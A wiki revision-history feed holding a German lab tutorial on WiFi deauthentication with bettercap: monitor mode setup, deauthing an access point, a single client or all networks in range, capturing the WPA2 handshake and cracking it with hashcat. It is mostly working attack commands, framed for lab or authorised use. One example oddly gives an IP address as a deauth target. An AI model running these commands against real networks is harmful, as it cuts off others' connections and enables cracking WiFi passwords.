https://wiki.ixheim.de/index.php?action=history&feed=atom&title=WiFi_Deauth_mit_bettercap
WiFi Deauth mit bettercap - Versionsgeschichte
2026-06-28T21:29:57Z
Versionsgeschichte dieser Seite in Xinux Wiki
MediaWiki 1.35.1
https://wiki.ixheim.de/index.php?title=WiFi_Deauth_mit_bettercap&diff=69932&oldid=prev
Thomas.will: Die Seite wurde neu angelegt: „= WiFi Deauth mit bettercap = Eine WiFi Deauthentication Attacke trennt Clients von ihrem Access Point. bettercap sendet gefälschte Deauth-Pakete im Namen des…“
2026-05-11T15:20:35Z
<p>Die Seite wurde neu angelegt: „= WiFi Deauth mit bettercap = Eine WiFi Deauthentication Attacke trennt Clients von ihrem Access Point. bettercap sendet gefälschte Deauth-Pakete im Namen des…“</p>
<p><b>Neue Seite</b></p><div>= WiFi Deauth mit bettercap =<br />
Eine WiFi Deauthentication Attacke trennt Clients von ihrem Access Point. bettercap sendet gefälschte Deauth-Pakete im Namen des APs. Nebeneffekt: Beim erneuten Verbinden kann der WPA2-Handshake mitgeschnitten werden.<br />
<br />
== Umgebung ==<br />
KALI = Angreifer (WLAN-Adapter mit Monitor-Modus)<br />
ZIEL-AP = 78:8c:b5:2a:5b:b4 (MAC des Access Points)<br />
OPFER = 192.168.16.131 (optional - gezielter Angriff)<br />
<br />
== Voraussetzung ==<br />
;WLAN-Adapter muss Monitor-Modus unterstützen<br />
iwconfig<br />
<br />
;Monitor-Modus aktivieren<br />
sudo ip link set wlan0 down<br />
sudo iwconfig wlan0 mode monitor<br />
sudo ip link set wlan0 up<br />
<br />
;Prüfen<br />
iwconfig wlan0<br />
wlan0 Mode:Monitor ...<br />
<br />
== Angreifer - bettercap starten ==<br />
sudo bettercap -iface wlan0<br />
<br />
== In der bettercap-Konsole ==<br />
;WiFi Reconnaissance starten<br />
wifi.recon on<br />
<br />
;Access Points anzeigen<br />
wifi.show<br />
<br />
;Nur einen bestimmten Kanal scannen<br />
wifi.recon.channel 6<br />
<br />
;Handshake-Datei festlegen<br />
set wifi.handshakes.file ./handshake.pcap<br />
<br />
== Deauth Angriff ==<br />
;Alle Clients eines APs deauthentifizieren<br />
wifi.deauth 78:8c:b5:2a:5b:b4<br />
<br />
;Einzelnen Client deauthentifizieren<br />
wifi.deauth 192.168.16.131<br />
<br />
;Alle APs in Reichweite (nicht empfohlen)<br />
wifi.deauth ff:ff:ff:ff:ff:ff<br />
<br />
== Handshake mitschneiden ==<br />
;Nach dem Deauth verbindet sich der Client erneut<br />
;bettercap speichert den WPA2-Handshake automatisch<br />
ls -la ./handshake.pcap<br />
<br />
;Handshake mit hashcat cracken<br />
hashcat -m 22000 handshake.pcap wordlist.txt<br />
<br />
== Optionen wifi ==<br />
;Hilfe anzeigen<br />
help wifi<br />
* wifi.handshakes.file → Speicherort für Handshakes (default=)<br />
* wifi.recon.channel → Kanal einschränken<br />
* wifi.skip.broken → Beschädigte Pakete überspringen<br />
<br />
== Hinweis ==<br />
* Nur im eigenen Labor oder mit ausdrücklicher Genehmigung<br />
* Monitor-Modus wird nicht von allen WLAN-Adaptern unterstützt<br />
* Empfohlene Adapter für Kali: '''Alfa AWUS036ACH''', '''Alfa AWUS036NH'''<br />
* In VirtualBox: USB WLAN-Adapter durchreichen<br />
<br />
== Mögliche Folgeangriffe ==<br />
* [[WPA2 Handshake cracken mit hashcat]]<br />
* [[Evil Twin Attacke]]<br />
* [[PMKID Attacke]]<br />
<br />
== Siehe auch ==<br />
* [[bettercap]]<br />
* [[ARP Spoofing mit bettercap]]</div>
Thomas.will